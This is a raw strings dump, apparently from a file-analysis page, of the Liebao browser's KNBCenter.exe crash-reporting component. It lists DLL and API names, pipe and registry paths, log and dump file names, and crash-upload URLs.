%3.1f%%)</pre><pre>CHROME_PROFILER_TIME</pre><pre>Unsupported encoding. JSON must be UTF-8.</pre><pre>Dictionary keys must be quoted.</pre><pre>full-memory-crash-report</pre><pre>USER32.dll</pre><pre>SHELL32.dll</pre><pre>ole32.dll</pre><pre>function not supported</pre><pre>operation canceled</pre><pre>address_family_not_supported</pre><pre>operation_in_progress</pre><pre>operation_not_supported</pre><pre>protocol_not_supported</pre><pre>operation_would_block</pre><pre>address family not supported</pre><pre>broken pipe</pre><pre>inappropriate io control operation</pre><pre>not supported</pre><pre>operation in progress</pre><pre>operation not permitted</pre><pre>operation not supported</pre><pre>operation would block</pre><pre>protocol not supported</pre><pre>operator</pre><pre>GetProcessWindowStation</pre><pre>liebao.exe</pre><pre>Src\kbsevMain.cpp</pre><pre>RegOpenKeyTransactedW</pre><pre>chrome.dll</pre><pre>breakpad_win_crash_service_knbcenter.cpp</pre><pre>pipe name is</pre><pre>ieframe.dll</pre><pre>hlink.dll</pre><pre>urlmon.dll</pre><pre>wininet.dll</pre><pre>mpr.dll</pre><pre>msls31.dll</pre><pre>oleaut32.dll</pre><pre>xmllite.dll</pre><pre>d2d1.dll</pre><pre>dxgi.dll</pre><pre>dnsapi.dll</pre><pre>d3d9.dll</pre><pre>avrt.dll</pre><pre>mf.dll</pre><pre>mfplat.dll</pre><pre>mfreadwrite.dll</pre><pre>msdmo.dll</pre><pre>authz.dll</pre><pre>msacm32.dll</pre><pre>setupapi.dll</pre><pre>evr.dll</pre><pre>avifil32.dll</pre><pre>wmdrmsdk.dll</pre><pre>\liebao\User Data\liebao.log</pre><pre>4.5.34.6725</pre><pre>report_dump_file</pre><pre>lXXxXXXXXXXX</pre><pre>http://dump.upload.duba.net/DumpFileUploader/duba_dump/__utm.gif</pre><pre>c:\liebao_src_pool\release.branch_34\src\security\tmp\Release\knbcenter\dbginfo\knbcenter.pdb</pre><pre>VERSION.dll</pre><pre>PSAPI.DLL</pre><pre>WaitNamedPipeW</pre><pre>TransactNamedPipe</pre><pre>SetNamedPipeHandleState</pre><pre>ConnectNamedPipe</pre><pre>CreateNamedPipeW</pre><pre>DisconnectNamedPipe</pre><pre>GetWindowsDirectoryW</pre><pre>KERNEL32.dll</pre><pre>RegOpenKeyExW</pre><pre>RegCloseKey</pre><pre>ADVAPI32.dll</pre><pre>SHLWAPI.dll</pre><pre>WTSAPI32.dll</pre><pre>USERENV.dll</pre><pre>WINMM.dll</pre><pre>GetProcessHeap</pre><pre>GetCPInfo</pre><pre>zcÁ</pre><pre>%Program Files%\liebao\4.5.34.6725\KNBCenter.exe</pre><pre><requestedExecutionLevel level="asInvoker" uiAccess="false" /></pre><pre>;#;'; ;/;3;7; <</pre><pre>1"1&1*1.12161:1</pre><pre>024282<2</pre><pre>; ;@;`;|;</pre><pre>0 0004080<0@0</pre><pre>4 4$40484<4</pre><pre>debug.log</pre><pre>.\debug.log</pre><pre>debug_message.exe</pre><pre>\StringFileInfo\xx\%ls</pre><pre>kernel32.dll</pre><pre>Chrome_MessagePumpWindow_%p</pre><pre>Emscoree.dll</pre><pre>- CRT not initialized</pre><pre>- Attempt to initialize the CRT more than once.</pre><pre>- floating point support not loaded</pre><pre>portuguese-brazilian</pre><pre>USER32.DLL</pre><pre>LIEBAO_EXE_PATH</pre><pre>CHROME_DLL_PATH</pre><pre>KNBCenter.exe</pre><pre>knbctrl.dll</pre><pre>kBrowserUpgrade2.dll</pre><pre>ksapi.dll</pre><pre>Local\LBKSINIT_{DE37097C-AC19-4513-9D64-E2E3D51676AE}</pre><pre>knbcenter.log</pre><pre>rknbpolicy.dll</pre><pre>\kmsgsvc.dll</pre><pre>Advapi32.dll</pre><pre>SYSTEM\CurrentControlSet\Services\%s</pre><pre>%d.%d.%d.%d</pre><pre>FLT_DENORMAL_OPERAND</pre><pre>FLT_INVALID_OPERATION</pre><pre>gcswf32.dll</pre><pre>\liebao\User Data\report.ini</pre><pre>report</pre><pre>cmdline</pre><pre>DumpKey</pre><pre>\kdumprep.exe"</pre><pre>https://clients2.google.com/cr/report</pre><pre>1441792</pre><pre>Breakpad/1.0 (Windows)</pre><pre>\\.\pipe\LiebaoCrashServices_SecSvr</pre><pre>dbghelp.dll</pre><pre>rpcrt4.dll</pre><pre>%s\%s.dmp</pre><pre>ddddddd</pre><pre>CLSID\{DA3CB2BC-1CCA-412d-BC7C-4DFB532D2223}\Implemented Categories\{D7BD91AA-CB34-4eae-A9D1-2DB9A7C6815C}</pre><pre>CLSID\{9B7A98EC-7EF9-468c-ACC8-37C793DBD7E0}\Implemented Categories\{A5F7140E-4311-4ef9-AABC-F55941B5EBE5}</pre><pre>x-x-x-xx-xxxxxx</pre><pre>/browser_version "4.5.34.6725"</pre><pre>%s\*.dmp</pre><pre>Data\kxecolbd.dat</pre><pre>%s%d\</pre><pre>Windows</pre><pre>Liebao\Crash Reports</pre><pre>verifier.dll</pre><pre>-full.dmp</pre><pre>knbcenter.dll</pre></pre></pre></pre></pre></y%d></pre></pre></pre></pre></a%2></pre></O%c></pre></n></pre></i6></pre></pre></pre></pre></pre></y%d></pre></pre>